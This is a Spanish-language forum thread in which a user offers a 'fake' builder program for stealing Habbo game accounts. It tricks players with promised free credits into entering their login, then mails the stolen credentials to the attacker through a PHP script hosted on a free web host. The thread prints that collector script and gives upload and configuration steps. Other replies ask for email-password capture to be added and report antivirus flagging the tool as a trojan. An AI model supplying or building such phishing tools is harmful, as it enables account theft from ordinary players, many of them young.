Bueno esto es una tonteria pero tenia ganas de hacerlo.
Seguro que todo el mundo habeis jugado alguna vez a [Enlace externo eliminado para invitados], es un Juego/chat online donde tienes tu muñeco comprar muebles haces salas etc.

He creado este fake Configurable para que podais robar cuentas del juego.
Viene con el php modificable para introducir Email y asunto del mensaje que os enviara a vuestro msN
Luego ese php lo subiis a un hosting Ej : Indetectables.gratishost.com/Habbo.php y luego ese link lo introduciis en el creador del Fake y crea el Fake con vuestra configuración.

Imagen

Saludos!
No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.
oyes men podrias hacer uno igual para boombang.tv

gracias salu2
Mmm solo cambiandole las imagenes.

Saludos!

Editado : al final no lo hare, no hay ganas la verdad. Puedes hacerlo tu con el ResHacker

Saludos!
Última edición por shark0 el 02 Nov 2008, 00:06, editado 1 vez en total.
esta muy bien solo no mas que le podrias agregar 2 cuadros mas, uno de email y el otro de contraseña de email para que introduzcan esos datos.... le cambias tambien obtener unos 10000 creditos y objetos de temporada, muchisimas gracias!!!!
Buenas. ante todo disculparme por mi ignorancia ya que soy nuevo, y no tengo ni idea de estas cosas aunque me gustaria empezar a manejar...

Bueno muchas gracias SharkI por otra gran obra como esta. pero...

¿Como te envia a ti la informacion de la victima?

Si es como yo croe, poniendo el e-mail donde tu tienes puesto, "[Enlace externo eliminado para invitados]"

si es de esa forma, ya e probado y no me llega nada..

Bueno gracias por adelantado y disculpenme por la razon que dije arriba..
ska-p99 escribió:Buenas. ante todo disculparme por mi ignorancia ya que soy nuevo, y no tengo ni idea de estas cosas aunque me gustaria empezar a manejar...

Bueno muchas gracias SharkI por otra gran obra como esta. pero...

¿Como te envia a ti la informacion de la victima?

Si es como yo croe, poniendo el e-mail donde tu tienes puesto, "[Enlace externo eliminado para invitados]"

si es de esa forma, ya e probado y no me llega nada..

Bueno gracias por adelantado y disculpenme por la razon que dije arriba..
No donde esta puesto "[Enlace externo eliminado para invitados]", hay es donde tienes que poner tu host, por ejemplo "[Enlace externo eliminado para invitados]" , tienes que modificar el archivo Habbo.php

<?php
$val = $_GET['value'];
mail ('Email', 'Asunto', $val);
?>
Email tienes que modificarlo y poner hay tu email.

PD: SharkI espero que no te importe que yo le haya respondido

Saludos
ok infinitas gracias! haber si dentro de poco me meto en este mundillo y comienzo a compartir algo con vosotros! espero que no sea en un futuro muy lejano!

Gracias de nuevo! Un saludo!
Imagen
gracias, lo probaremos.

saludos;
hola, estoy en un ordenador que no es mio, tiene el f-secure, y al poner el host y dar a crear me salta diciendo que se me ha decectado un troyano. no me da ninguna opcion salvo quitar el archivo nuevo, que puedo hacer aparte de desactivar el antivirus?

mi hermano ska-p99 lo probo sin antivirus y se le jodio el ordenador, tenemos que formatearlo. puede haber sido este programa?

PD: yo. al igual que mi hermano soy un inexperto..

Vale, edito, he empezado a buscar cosillas y a intentar aprender a manejarme con el vb..

quiero crear un programa similar al tuyo (para practicar, mas ke nada), que cuando el primo ponga el nombre y la contraseña y lede al boton de obtener creditos se envien sus datos a mi email, como lo consigo?

gracias!
Imagen
oye gracias felicitaciones
Una buena herramienta...... sin duda
Hola yo en habbofake.php pongo mi direccion de correo y no me sale nada perdon soy lammer en esto alguien me puede ayudar?? una cosa cuando dicen host a ke se refieren esk de informatica se bien poco
Modificas el archivo php que viene en el rar por tus datos, luego lo subes a un hosting que tngas, puedes crearte uno aqui : [Enlace externo eliminado para invitados] un hosting seria como un espacio web ,y para subirle archivos pues solo tienes que saber los datos del FTP y subirlo ;)

Luego en el builder del fake pones la url donde se encuentra el archivo php

Saludos!
ah vale entonces este programa tu k tienes k decirle k te dan créditos gratis si inserta su nick y contraseña y cuando lo inserta te lo envia a tu email? es asi?.
si, si tienes todo bien configurado
Cerrado

Volver a “Nuestros Programas”